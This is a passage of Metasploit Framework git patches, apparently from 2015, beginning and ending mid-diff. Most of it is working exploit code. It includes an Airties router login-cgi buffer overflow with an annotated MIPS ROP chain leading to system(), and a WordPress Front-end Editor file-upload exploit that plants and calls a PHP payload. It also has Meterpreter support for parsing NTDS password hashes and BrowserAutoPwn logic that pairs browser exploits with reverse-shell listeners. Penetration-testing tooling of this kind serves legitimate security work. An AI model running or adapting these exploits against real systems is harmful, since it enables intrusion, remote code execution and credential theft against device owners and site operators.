+    shellcode = prepare_shellcode(cmd)
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri'     => "/cgi-bin/login",
+        'encode_params' => false,
+        'vars_post' => {
+          'redirect' => shellcode,
+          'user'     => rand_text_alpha(5),
+          'password' => rand_text_alpha(8)
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end

From 1ec0e09a43c94f649894d138ac0fb99dba2d6168 Mon Sep 17 00:00:00 2001
From: m-1-k-3 <devnull@s3cu1ty.de>
Date: Wed, 22 Apr 2015 10:32:47 +0200
Subject: [PATCH 0018/1013] msftidy

---
 modules/exploits/linux/http/airties_login_cgi_bof.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb
index d1679dd6a2..c8d99dc030 100644
--- a/modules/exploits/linux/http/airties_login_cgi_bof.rb
+++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb
@@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Airties login cgi Buffer Overflow',
+      'Name'           => 'Airties login-cgi Buffer Overflow',
       'Description'    => %q{
         This module exploits an remote buffer overflow vulnerability on several Airties routers.
         The vulnerability exists in the handling of HTTP queries to the login cgi with
-        long redirect parameter values. The vulnerability can be exploitable without authentication. 
+        long redirect parameter values. The vulnerability can be exploitable without authentication.
         This module has been tested successfully on Airties firmware AirTies_Air5650v3TT_FW_1.0.2.0.bin
-        in emulation. Other firmware versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, 
+        in emulation. Other firmware versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453,
         Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
       },
       'Author'         =>

From f5b0a7e08277d603623b4e1680821c465f44364c Mon Sep 17 00:00:00 2001
From: m-1-k-3 <devnull@s3cu1ty.de>
Date: Thu, 23 Apr 2015 00:11:02 +0200
Subject: [PATCH 0019/1013] include rop gadget description

---
 .../linux/http/airties_login_cgi_bof.rb       | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)

diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb
index c8d99dc030..ece3f68ec9 100644
--- a/modules/exploits/linux/http/airties_login_cgi_bof.rb
+++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb
@@ -89,14 +89,43 @@ class Metasploit3 < Msf::Exploit::Remote
   def prepare_shellcode(cmd)
     shellcode = rand_text_alpha_upper(target['Offset'])                    # padding
     shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N")     # restore registers with controlled values
+
+                 # 0003FE20                 lw      $ra, 0x48+var_4($sp)
+                 # 0003FE24                 lw      $s7, 0x48+var_8($sp)
+                 # 0003FE28                 lw      $s6, 0x48+var_C($sp)
+                 # 0003FE2C                 lw      $s5, 0x48+var_10($sp)
+                 # 0003FE30                 lw      $s4, 0x48+var_14($sp)
+                 # 0003FE34                 lw      $s3, 0x48+var_18($sp)
+                 # 0003FE38                 lw      $s2, 0x48+var_1C($sp)
+                 # 0003FE3C                 lw      $s1, 0x48+var_20($sp)
+                 # 0003FE40                 lw      $s0, 0x48+var_24($sp)
+                 # 0003FE44                 jr      $ra
+                 # 0003FE48                 addiu   $sp, 0x48
+
     shellcode << rand_text_alpha_upper(36)                                 # padding
     shellcode << [target['LibcBase'] + target['System']].pack("N")         # s0 - system address-1
     shellcode << rand_text_alpha_upper(16)                                 # unused registers $s1 - $s4
     shellcode << [target['LibcBase'] + target['CallSystem']].pack("N")     # $s5 - call system
+
+                 # 00041C10                 move    $t9, $s0
+                 # 00041C14                 jalr    $t9
+                 # 00041C18                 nop
+
     shellcode << rand_text_alpha_upper(8)                                  # unused registers $s6 - $s7
     shellcode << [target['LibcBase'] + target['PrepareSystem']].pack("N")  # write sp to $a0 -> parameter for call to system
+
+                 # 000215B8                 addiu   $a0, $sp, 0x20
+                 # 000215BC                 lw      $ra, 0x1C($sp)
+                 # 000215C0                 jr      $ra
+                 # 000215C4                 addiu   $sp, 0x20
+
     shellcode << rand_text_alpha_upper(28)                                 # padding
     shellcode << [target['LibcBase'] + target['CalcSystem']].pack("N")     # add 1 to s0 (calculate system address)
+
+                 # 000111EC                 move    $t9, $s5
+                 # 000111F0                 jalr    $t9
+                 # 000111F4                 addiu   $s0, 1
+
     shellcode << cmd
   end
 

From 6c77c4bb52d00b1b92051e5de5c775c9464ebf06 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Fri, 24 Apr 2015 15:50:12 -0500
Subject: [PATCH 0020/1013] opening groundwork

added a priv extension method to open
a stream channel to read ntdsaccounts from
and an NTDS account class to accept the
data and parse it into a useable structure

MSP-12357
---
 lib/metasploit/framework/ntds/account.rb      | 81 +++++++++++++++++++
 .../post/meterpreter/extensions/priv/priv.rb  | 11 +++
 .../post/meterpreter/extensions/priv/tlv.rb   |  3 +
 3 files changed, 95 insertions(+)
 create mode 100644 lib/metasploit/framework/ntds/account.rb

diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
new file mode 100644
index 0000000000..2ac1cd44a1
--- /dev/null
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -0,0 +1,81 @@
+module Metasploit
+  module Framework
+    module NTDS
+      # This class represents an NTDS account structure as sent back by Meterpreter's
+      # priv extension.
+      class Account
+
+        attr_accessor :name
+        attr_accessor :description
+        attr_accessor :rid
+        attr_accessor :disabled
+        attr_accessor :locked
+        attr_accessor :no_pass
+        attr_accessor :no_expire
+        attr_accessor :expired
+        attr_accessor :logon_count
+        attr_accessor :nt_history_count
+        attr_accessor :lm_history_count
+        attr_accessor :expiry_date
+        attr_accessor :logon_date
+        attr_accessor :logon_time
+        attr_accessor :pass_date
+        attr_accessor :pass_time
+        attr_accessor :lm_hash
+        attr_accessor :nt_hash
+        attr_accessor :lm_history
+        attr_accessor :nt_history
+        attr_accessor :sid
+
+
+        def initialize(raw_data)
+          raise ArgumentError, "No Data Supplied" unless raw_data.present?
+          raise ArgumentError, "Invalid Data" unless raw_data.length == 3948
+          data = raw_data.dup
+          @name = get_string(data,40)
+          @description = get_string(data,2048)
+          @rid = get_int(data)
+          @disabled = get_boolean(data)
+          @locked = get_boolean(data)
+          @no_pass = get_boolean(data)
+          @no_expire = get_boolean(data)
+          @expired = get_boolean(data)
+          @logon_count = get_int(data)
+          @nt_history_count = get_int(data)
+          @lm_history_count = get_int(data)
+          @expiry_data = get_string(data,30)
+          @logon_data =  get_string(data,30)
+          @logon_time = get_string(data,30)
+          @pass_date = get_string(data,30)
+          @pass_time = get_string(data,30)
+          @lm_hash = get_string(data,33)
+          @nt_hash = get_string(data,33)
+          @lm_history = get_hash_history(data)
+          @nt_history = get_hash_history(data)
+          @sid = data
+        end
+
+        private
+
+        def get_boolean(data)
+          get_int(data) == 1
+        end
+
+        def get_hash_history(data)
+          raw_history = data.slice!(0,792)
+          split_history = raw_history.scan(/.{1,33}/)
+          split_history.map!{ |hash| hash.gsub(/\x00/,'')}
+          split_history.reject!{ |hash| hash.blank? }
+        end
+
+        def get_int(data)
+          data.slice!(0,4).unpack('L').first
+        end
+
+        def get_string(data,length)
+          data.slice!(0,length).gsub(/\x00/,'')
+        end
+      end
+    end
+  end
+end
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index 71575128f9..65f2b34e82 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -95,6 +95,17 @@ class Priv < Extension
     }
   end
 
+  def ntds_parse(filepath)
+    request = Packet.create_request( 'priv_ntds_parse' )
+    request.add_tlv( TLV_TYPE_NTDS_PATH, filepath)
+    response = client.send_request( request, 90 )
+    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
+    if channel_id.nil?
+      raise Exception, "We did not get a channel back!"
+    end
+    channel = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(client, channel_id, "priv_ntds", CHANNEL_FLAG_SYNCHRONOUS)
+  end
+
   #
   # Modifying privileged file system attributes.
   #
diff --git a/lib/rex/post/meterpreter/extensions/priv/tlv.rb b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
index 92cf1b7f4a..37fbc50bc5 100644
--- a/lib/rex/post/meterpreter/extensions/priv/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
@@ -22,6 +22,9 @@ TLV_TYPE_ELEVATE_SERVICE_NAME       = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2
 TLV_TYPE_ELEVATE_SERVICE_DLL        = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 202)
 TLV_TYPE_ELEVATE_SERVICE_LENGTH     = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 203)
 
+#NTDS
+TLV_TYPE_NTDS_PATH                  = TLV_META_TYPE_STRING | (TLV_EXTENSIONS +   301)
+
 end
 end
 end

From a4b4d7cf6a645b43522ccca0fee21ebdda2bd62a Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Sat, 25 Apr 2015 22:00:05 -0300
Subject: [PATCH 0021/1013] Add WordPress Front-end Editor File Upload Vuln

---
 .../webapp/wp_frontend_editor_file_upload.rb  | 79 +++++++++++++++++++
 1 file changed, 79 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb

diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
new file mode 100644
index 0000000000..e9c413891a
--- /dev/null
+++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
@@ -0,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'Wordpress Front-end Editor File Upload',
+      'Description'    => %q{
+          The Wordpress Front-end Editor plugin contains an authenticated file upload
+          vulnerability. We can upload arbitrary files to the upload folder, because
+          the plugin also uses it's own file upload mechanism instead of the wordpress
+          api it's possible to upload any file type.
+      },
+      'Author'         =>
+        [
+          'Sammy', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['OSVDB', '83637'],
+          ['WPVDB', '7569'],
+          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Front-End Editor 2.2.1', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 04 2012'))
+  end
+
+  def check
+    check_plugin_version_from_readme('front-end-editor', '2.3')
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to upload payload")
+    filename = "#{rand_text_alpha_lower(5)}.php"
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'),
+      'ctype'    => 'application/octet-stream',
+      'headers'  => {
+        'X-File-Name' => "#{filename}"
+      },
+      'data' => payload.encoded
+    )
+
+    if res
+      if res.code == 200
+        register_files_for_cleanup(filename)
+      else
+        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
+      end
+    else
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
+    print_status("#{peer} - Calling uploaded file #{filename}")
+    send_request_cgi(
+      { 'uri'    => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") },
+      5
+    )
+  end
+end

From b537c8ae2c89e1e64157293f6726d10e39fb61e1 Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Sun, 26 Apr 2015 01:28:55 -0300
Subject: [PATCH 0022/1013] Changed fail_with output.

---
 modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
index e9c413891a..1c9663d6d0 100644
--- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
       if res.code == 200
         register_files_for_cleanup(filename)
       else
-        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
+        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
       end
     else
       fail_with(Failure::Unknown, 'Server did not respond in an expected way')

From 43492b7c67331e6f687c42dc82612655af43ba2f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 28 Apr 2015 18:17:32 -0500
Subject: [PATCH 0023/1013] Some progress

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 85 +++++++++++++++++++++--
 lib/msf/core/exploit/http/server.rb       |  6 +-
 lib/msf/core/exploit/tcp_server.rb        |  8 ++-
 modules/exploits/multi/browser/autopwn.rb |  4 +-
 4 files changed, 92 insertions(+), 11 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 03789a10f5..12703fd5f8 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -20,6 +20,7 @@ module Msf
 
     # The default platform-specific payloads and preferred LPORTS.
     # The hash key is the name of the platform that matches what's on the module.
+    # The loader order is specific.
     DEFAULT_PAYLOADS = {
       'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp', 'lport' => 4444 },
       'linux'   => { 'payload' => 'linux/meterpreter/reverse_tcp',   'lport' => 4445 },
@@ -86,7 +87,8 @@ module Msf
       xploit.datastore['SSL'] = datastore['SSL']                  # Use SSL or not
       xploit.datastore['SSLVersion'] = datastore['SSLVersion']    # SSL Version
       xploit.datastore['LHOST'] = datastore['LHOST'] || '0.0.0.0' # Attacker's IP
-      xploit.datastore['URI'] = "/#{assign_module_resource}"      # A unique resource URI for the exploit
+      xploit.datastore['URIPATH'] = "/#{assign_module_resource}"   # A unique resource URI for the exploit
+      xploit.datastore['MODULEOWNER'] = 'BAP'                      # Let other mixins know we're in BrowserAutoPwn mode
     end
 
 
@@ -235,7 +237,7 @@ module Msf
           'Payload' => listener_info['payload'],
           'RunAsJob' => true
         )
-        $stderr.puts multi_handler.inspect
+        #$stderr.puts multi_handler.inspect
       end
     end
 
@@ -249,6 +251,71 @@ module Msf
     end
 
 
+    def parse_rank(rank)
+      rank_str = ''
+
+      case rank
+      when 0
+        rank_str = 'Manual'
+      when 100
+        rank_str = 'Low'
+      when 200
+        rank_str = 'Average'
+      when 300
+        rank_str = 'Normal'
+      when 400
+        rank_str = 'Good'
+      when 500
+        rank_str = 'Great'
+      when 600
+        rank_str = 'Excellent'
+      end
+
+      rank_str
+    end
+
+
+    def select_payload(m)
+      selected_payload = DEFAULT_PAYLOADS['generic']['payload']
+      DEFAULT_PAYLOADS.each_pair do |p, info|
+        preferred = info['payload']
+        m.compatible_payloads.each do |k|
+          return preferred if k[0] == preferred
+        end
+      end
+
+      selected_payload
+    end
+
+
+    def start_exploits
+      order = 1
+      table = Rex::Ui::Text::Table.new(
+        "Header"  => "Exploits",
+        "Indent"  => 1,
+        "Columns" => ["Order", "Rank", "Name", "URI"]
+      )
+
+      bap_exploits.each do |m|
+        m.exploit_simple(
+          'LocalInput'     => self.user_input,
+          'LocalOutput'    => self.user_output,
+          'Target'         => 0,
+          'Payload'        => select_payload(m),
+          'RunAsJob'       => true
+        )
+        table << [order.to_s, parse_rank(rank), m.shortname, m.get_resource]
+        order += 1
+      end
+
+      print_line
+      print_status("The following is a list of exploits that are ready for BrowserAutopwn.")
+      print_status("Exploits with the highest ranking and newest will be tried first.")
+      print_line
+      print_line table.to_s
+    end
+
+
     # Sets up BAPv2. This is like our main function.
     #
     # @see #init_exploits
@@ -256,18 +323,26 @@ module Msf
     # @return [void]
     def setup
       t1 = Time.now
+      self.datastore['MODULEOWNER'] = 'BAP'
       super
       print_status("Searching BES exploits, please wait...")
       init_exploits
       sort_bap_exploits
-#      $stderr.puts
-#      $stderr.puts list_bap_names
       print_status("#{@bap_exploits.length} BES exploits found.")
 
       print_status("Starting listeners...")
       start_payload_listeners
+      print_status("Starting exploit modules...")
+      start_exploits
       t2 = Time.now
-      $stderr.puts (t2-t1).inspect
+      print_line
+      print_status("Time spent: #{(t2-t1).inspect}")
+    end
+
+    def start_service
+      super
+      print_status("Please use the following URL for the browser attack:")
+      print_status("BrowserAutoPwn URL: #{self.get_uri}")
     end
 
   end
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index 7e52027dd5..ae54676bcb 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -226,9 +226,11 @@ module Exploit::Remote::HttpServer
       print_status("Intentionally using insecure SSL compression. Your operating system might not respect this!")
     end
 
-    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
+    unless datastore['MODULEOWNER'] == 'BAP'
+      print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
+    end
 
-    if (opts['ServerHost'] == '0.0.0.0')
+    if opts['ServerHost'] == '0.0.0.0' && datastore['MODULEOWNER'] != 'BAP'
       print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
     end
 
diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb
index 771a1bad6b..3d53977a14 100644
--- a/lib/msf/core/exploit/tcp_server.rb
+++ b/lib/msf/core/exploit/tcp_server.rb
@@ -47,7 +47,9 @@ module Exploit::Remote::TcpServer
   def exploit
 
     start_service()
-    print_status("Server started.")
+    unless datastore['MODULEOWNER'] == 'BAP'
+      print_status("Server started.")
+    end
 
     # Call the exploit primer
     primer
@@ -69,7 +71,9 @@ module Exploit::Remote::TcpServer
     super
     if(service)
       stop_service()
-      print_status("Server stopped.")
+      unless datastore['MODULEOWNER'] == 'BAP'
+        print_status("Server stopped.")
+      end
     end
   end
 
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 1edbcc95aa..ba227899d2 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -42,8 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_request_exploit(cli, request, target_info)
-    $stderr.puts get_target.inspect
-    $stderr.puts find_suitable_exploits(target_info)
+    #$stderr.puts get_target.inspect
+    #$stderr.puts find_suitable_exploits(target_info)
     send_exploit_html(cli, 'OK')
   end
 

From 43f5323e8dc007059e5d89aef9743ad4213ad6a0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 28 Apr 2015 21:26:31 -0500
Subject: [PATCH 0024/1013] More progress

---
 lib/msf/core/exploit/browserautopwnv2.rb | 100 ++++++++++-------------
 lib/msf/core/exploit/http/server.rb      |   4 +
 2 files changed, 47 insertions(+), 57 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 12703fd5f8..a4e54f02de 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -22,12 +22,12 @@ module Msf
     # The hash key is the name of the platform that matches what's on the module.
     # The loader order is specific.
     DEFAULT_PAYLOADS = {
+      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',       'lport' => 4449 },
+      'android' => { 'payload' => 'android/meterpreter/reverse_tcp', 'lport' => 4448 },
       'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp', 'lport' => 4444 },
       'linux'   => { 'payload' => 'linux/meterpreter/reverse_tcp',   'lport' => 4445 },
       'osx'     => { 'payload' => 'osx/meterpreter/reverse_tcp',     'lport' => 4446 },
       'java'    => { 'payload' => 'java/meterpreter/reverse_tcp',    'lport' => 4447 },
-      'android' => { 'payload' => 'android/meterpreter/reverse_tcp', 'lport' => 4448 },
-#      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',       'lport' => 4449 },
       'generic' => { 'payload' => 'generic/shell_reverse_tcp',       'lport' => 4450 }
     }
 
@@ -80,7 +80,7 @@ module Msf
     #
     # @return [void]
     def set_exploit_options(xploit)
-      p = pick_default_payload(xploit)
+      p = select_payload(xploit)
       xploit.datastore['DisablePayloadHandler'] = true            # BAP should handle the handlers
       xploit.datastore['PAYLOAD'] = p['payload']                  # We'll need this information later for multi handler
       xploit.datastore['LPORT']   = p['lport']                    # We'll need this information later for multi handler
@@ -121,37 +121,6 @@ module Msf
     end
 
 
-    # Returns a preferred default payload. The load order is based on this preference:
-    # if there is a browser-specific payload (such as firefox), then we'll use that as default.
-    # And then we fall back to the module's platform. If there's nothing we can choose,
-    # then we'll just use the generic reverse shell.
-    #
-    # @see DEFAULT_PAYLOADS
-    # @param [Class] The initialized exploit object.
-    # @return [Hash] The default payload information from DEFAULT_PAYLOADS.
-    def pick_default_payload(m)
-      module_platforms = m.platform.platforms
-      preferred_payload = DEFAULT_PAYLOADS['generic']
-
-      # Specific load order
-      if module_platforms.include?('firefox')
-        preferred_payload = DEFAULT_PAYLOADS['firefox']
-      elsif module_platforms.include?('java')
-        preferred_payload = DEFAULT_PAYLOADS['java']
-      elsif module_platforms.include?('android')
-        preferred_payload = DEFAULT_PAYLOADS['android']
-      elsif module_platforms.include?('win')
-        preferred_payload = DEFAULT_PAYLOADS['win']
-      elsif module_platforms.include?('linux')
-        preferred_payload = DEFAULT_PAYLOADS['linux']
-      elsif module_platforms.include?('osx')
-        preferred_payload = DEFAULT_PAYLOADS['osx']
-      end
-
-      preferred_payload
-    end
-
-
     # Modifies @bap_exploits by sorting. The newest and with the highest ranking goes on top.
     #
     # @see #bap_exploits The read-only attribute.
@@ -226,6 +195,7 @@ module Msf
     def start_payload_listeners
       DEFAULT_PAYLOADS.each_pair do |platform, listener_info|
         multi_handler = framework.modules.create('exploit/multi/handler')
+        multi_handler.datastore['LHOST'] = '0.0.0.0'
         multi_handler.datastore['PAYLOAD'] = listener_info['payload']
         multi_handler.datastore['LPORT'] = listener_info['lport']
         multi_handler.datastore['EXITONSESSION'] = false
@@ -237,7 +207,7 @@ module Msf
           'Payload' => listener_info['payload'],
           'RunAsJob' => true
         )
-        #$stderr.puts multi_handler.inspect
+        $stderr.puts multi_handler.inspect
       end
     end
 
@@ -276,11 +246,11 @@ module Msf
 
 
     def select_payload(m)
-      selected_payload = DEFAULT_PAYLOADS['generic']['payload']
+      selected_payload = DEFAULT_PAYLOADS['generic']
       DEFAULT_PAYLOADS.each_pair do |p, info|
         preferred = info['payload']
         m.compatible_payloads.each do |k|
-          return preferred if k[0] == preferred
+          return info if k[0] == preferred
         end
       end
 
@@ -289,30 +259,15 @@ module Msf
 
 
     def start_exploits
-      order = 1
-      table = Rex::Ui::Text::Table.new(
-        "Header"  => "Exploits",
-        "Indent"  => 1,
-        "Columns" => ["Order", "Rank", "Name", "URI"]
-      )
-
       bap_exploits.each do |m|
         m.exploit_simple(
-          'LocalInput'     => self.user_input,
-          'LocalOutput'    => self.user_output,
-          'Target'         => 0,
-          'Payload'        => select_payload(m),
-          'RunAsJob'       => true
+          'LocalInput'  => self.user_input,
+          'LocalOutput' => self.user_output,
+          'Target'      => 0,
+          'Payload'     => m.datastore['PAYLOAD'],
+          'RunAsJob'    => true
         )
-        table << [order.to_s, parse_rank(rank), m.shortname, m.get_resource]
-        order += 1
       end
-
-      print_line
-      print_status("The following is a list of exploits that are ready for BrowserAutopwn.")
-      print_status("Exploits with the highest ranking and newest will be tried first.")
-      print_line
-      print_line table.to_s
     end
 
 
@@ -334,15 +289,46 @@ module Msf
       start_payload_listeners
       print_status("Starting exploit modules...")
       start_exploits
+      show_ready_exploits
       t2 = Time.now
       print_line
       print_status("Time spent: #{(t2-t1).inspect}")
     end
 
+
+    def show_ready_exploits
+      order = 1
+      table = Rex::Ui::Text::Table.new(
+        "Header"  => "Exploits",
+        "Indent"  => 1,
+        "Columns" => ["Order", "Rank", "Name", "PATH", "Payload"]
+      )
+
+      bap_exploits.each do |m|
+        table << [
+          order.to_s,
+          parse_rank(m.rank),
+          m.shortname,
+          m.datastore['URIPATH'],
+          "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
+        ]
+        order += 1
+      end
+
+      print_line
+      print_status("The following is a list of exploits that are ready for BrowserAutopwn.")
+      print_status("Exploits with the highest ranking and newest will be tried first.")
+      print_line
+      print_line table.to_s
+    end
+
+
     def start_service
       super
       print_status("Please use the following URL for the browser attack:")
       print_status("BrowserAutoPwn URL: #{self.get_uri}")
+#      $stderr.puts
+#      $stderr.puts bap_exploits.inspect
     end
 
   end
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index ae54676bcb..bba5e70a4b 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -460,6 +460,10 @@ module Exploit::Remote::HttpServer
     @service_path ? @service_path.dup : nil
   end
 
+  def blah
+    @my_resources.inspect
+  end
+
   #
   # Return a full url of the form <tt>http://1.1.1.1:8080/resource/</tt>
   #

From 65b7659d27ac5851e1f373eaddd496fd3e28ffb4 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Apr 2015 01:01:36 -0500
Subject: [PATCH 0025/1013] Some progress

---
 lib/msf/core/exploit/browserautopwnv2.rb | 40 +++++++++++++++---------
 lib/msf/core/exploit/http/server.rb      |  4 ---
 lib/msf/core/handler/reverse_tcp.rb      |  5 +--
 modules/exploits/multi/handler.rb        |  4 ++-
 4 files changed, 32 insertions(+), 21 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index a4e54f02de..3ede415109 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -51,7 +51,8 @@ module Msf
     # @see #bap_exploits The read-only attribute.
     # @return [void]
     def init_exploits
-      @bap_exploits = [] # Initialized BES modules are held here
+      # Initialized BES modules are held here
+      @bap_exploits = []
 
       init_exploit_paths.each do |m|
         module_name = m.first
@@ -188,26 +189,40 @@ module Msf
     end
 
 
+    def is_payload_handler_wanted?(payload_name)
+      bap_exploits.each do |m|
+        return true if m.datastore['PAYLOAD'] == payload_name
+      end
+
+      false
+    end
+
+
     # Creates payload listeners.
     #
     # @note INCOMPLETE
     # @return [void]
     def start_payload_listeners
       DEFAULT_PAYLOADS.each_pair do |platform, listener_info|
+        # Exploit failed: firefox/shell_reverse_tcp is not a compatible payload
+        next if listener_info['payload'] == 'firefox/shell_reverse_tcp'
+
+        # Don't waste resources. This shaves about a second in loading speed.
+        next unless is_payload_handler_wanted?(listener_info['payload'])
+
         multi_handler = framework.modules.create('exploit/multi/handler')
         multi_handler.datastore['LHOST'] = '0.0.0.0'
         multi_handler.datastore['PAYLOAD'] = listener_info['payload']
         multi_handler.datastore['LPORT'] = listener_info['lport']
         multi_handler.datastore['EXITONSESSION'] = false
         multi_handler.datastore['EXITFUNC'] = 'thread'
-#        multi_handler.datastore['ReverseListenerBindAddress'] = datastore['ReverseListenerBindAddress']
+        multi_handler.datastore['MODULEOWNER'] = 'BAP'
         multi_handler.exploit_simple(
           'LocalInput' => self.user_input,
           'LocalOutput' => self.user_output,
           'Payload' => listener_info['payload'],
           'RunAsJob' => true
         )
-        $stderr.puts multi_handler.inspect
       end
     end
 
@@ -280,16 +295,18 @@ module Msf
       t1 = Time.now
       self.datastore['MODULEOWNER'] = 'BAP'
       super
+
       print_status("Searching BES exploits, please wait...")
       init_exploits
       sort_bap_exploits
       print_status("#{@bap_exploits.length} BES exploits found.")
 
-      print_status("Starting listeners...")
-      start_payload_listeners
       print_status("Starting exploit modules...")
       start_exploits
-      show_ready_exploits
+
+      print_status("Starting listeners...")
+      start_payload_listeners
+
       t2 = Time.now
       print_line
       print_status("Time spent: #{(t2-t1).inspect}")
@@ -297,38 +314,33 @@ module Msf
 
 
     def show_ready_exploits
-      order = 1
       table = Rex::Ui::Text::Table.new(
         "Header"  => "Exploits",
         "Indent"  => 1,
-        "Columns" => ["Order", "Rank", "Name", "PATH", "Payload"]
+        "Columns" => ["Rank", "Name", "Path", "Payload"]
       )
 
       bap_exploits.each do |m|
         table << [
-          order.to_s,
           parse_rank(m.rank),
           m.shortname,
